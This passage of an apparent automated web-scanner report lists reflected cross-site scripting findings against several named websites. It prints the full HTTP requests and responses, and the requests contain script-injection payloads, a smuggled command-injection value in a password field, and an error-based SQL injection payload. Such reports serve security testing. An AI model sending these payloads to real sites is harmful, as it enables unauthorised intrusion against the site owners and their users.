User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:30 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1e7121"><script>alert(1)</script>df0c78cb9fa" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

5.14. https://hourly.deploy.com/hmc/report/index.cfm ['"--> parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the '"--></style></script><script>netsparker(0x00004F)</script> request parameter is copied into the HTML document as plain text between tags. The payload e83be<script>alert(1)</script>523da594bd0 was submitted in the '"--></style></script><script>netsparker(0x00004F)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script>e83be<script>alert(1)</script>523da594bd0 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:07 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
</script>e83be<script>alert(1)</script>523da594bd0" method="post">
...[SNIP]...

5.15. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fe1a"><script>alert(1)</script>db5eebe2940 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 63

j_password=%26ping%20-c%2026%20127.0.0.1%20%26&j_username=Smith7fe1a"><script>alert(1)</script>db5eebe2940

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302c38d98d257a233c;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:03 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<input name="j_username" type="text" tabindex="1" title="Username" size="25" maxlength="50" value="Smith7fe1a"><script>alert(1)</script>db5eebe2940" onKeyPress="checkEnter();">
...[SNIP]...

5.16. https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the j_username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7302a"><script>alert(1)</script>4a4bb4d857e243994 was submitted in the j_username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:32 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:32 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?j_password=&j_username=7302a"><script>alert(1)</script>4a4bb4d857e243994" method="post">
...[SNIP]...

5.17. https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3979a"><script>alert(1)</script>e93cf277ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:33 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:33 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:33 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?3979a"><script>alert(1)</script>e93cf277ffd=1" method="post">
...[SNIP]...

5.18. https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48f1"><script>alert(1)</script>05d2c68e84e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000004)%3C/script%3Ed48f1"><script>alert(1)</script>05d2c68e84e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?nsextt='%22--%3e%3c/style%3e%3c/script%3e%3cscript%3enetsparker(0x000004)%3c/script%3ed48f1"><script>alert(1)</script>05d2c68e84e" method="post">
...[SNIP]...

5.19. https://hourly.deploy.com/hmc/report/index.cfm [register parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The value of the register request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d039e"><script>alert(1)</script>e3b5619accb was submitted in the register parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:31 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?register=1d039e"><script>alert(1)</script>e3b5619accb" method="post" onSubmit="document.form1.register.disabled='disabled';">
...[SNIP]...

5.20. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ec4"><script>alert(1)</script>93019b07260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)?20ec4"><script>alert(1)</script>93019b07260=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:10 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:10 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?20ec4"><script>alert(1)</script>93019b07260=1" method="post">
...[SNIP]...

5.21. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d3a0"><script>alert(1)</script>c00f54e3219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)?7d3a0"><script>alert(1)</script>c00f54e3219=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:11 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:11 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<form name="form1" action="/hmc/report/index.cfm?7d3a0"><script>alert(1)</script>c00f54e3219=1" method="post">
...[SNIP]...

5.22. http://ib.adnxs.com/ab [cnd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4615b'-alert(1)-'2e372cc3b5e was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso+zUvs)2CF+[(.(>y<]pD>][8NX.G>S>V7j*s_)x:*q=s36MWy?D-?d]@6n3)XNf!R#M(IK'+%WGSupCXe=?5wnabP%erqPAShL[Uy0[f]+>:LCj1ySu%)*-+(fM0+(qUzu:>+s*?ID=v0CO9q79tdlePQ[@TNKu[vnkf?@DNFXWGQNZq=1iuS3DC; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:24:28 GMT
Content-Length: 1529

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
r0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e/referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2Nh
...[SNIP]...

5.23. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kronos.tt.omtrdc.net
Path:	/m2/kronos/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 48696<script>alert(1)</script>25fc46847c1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Mon, 25 Apr 2011 13:56:09 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303738433760-48782.17");

5.24. http://kroogy.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://kroogy.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 was submitted in the REST URL parameter 1. This input was echoed as 286d0<img src=a onerror=alert(1)>5a8dc7282d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico286d0<img src=a onerror=alert(1)>5a8dc7282d8Controller</strong>
...[SNIP]...

5.25. http://learn.shavlik.com/shavlik/index.cfm [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 41f63--><script>alert(1)</script>cd0802b0b7c was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=521&pg=372&h=041f63--><script>alert(1)</script>cd0802b0b7c&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<script>alert(1)</script>cd0802b0b7c|372 -- -->
...[SNIP]...

5.26. http://learn.shavlik.com/shavlik/index.cfm [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709 was submitted in the m parameter. This input was echoed as 29f68<img src=a onerror=alert(1)>8c4ff1d7709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '29f68<img src=a onerror=alert(1)>8c4ff1d7709 AND DMMESSAGE.userCompanyID = 21
' at line 7
</font>
...[SNIP]...

5.27. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7a431<script>alert(1)</script>ce4081a25f0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

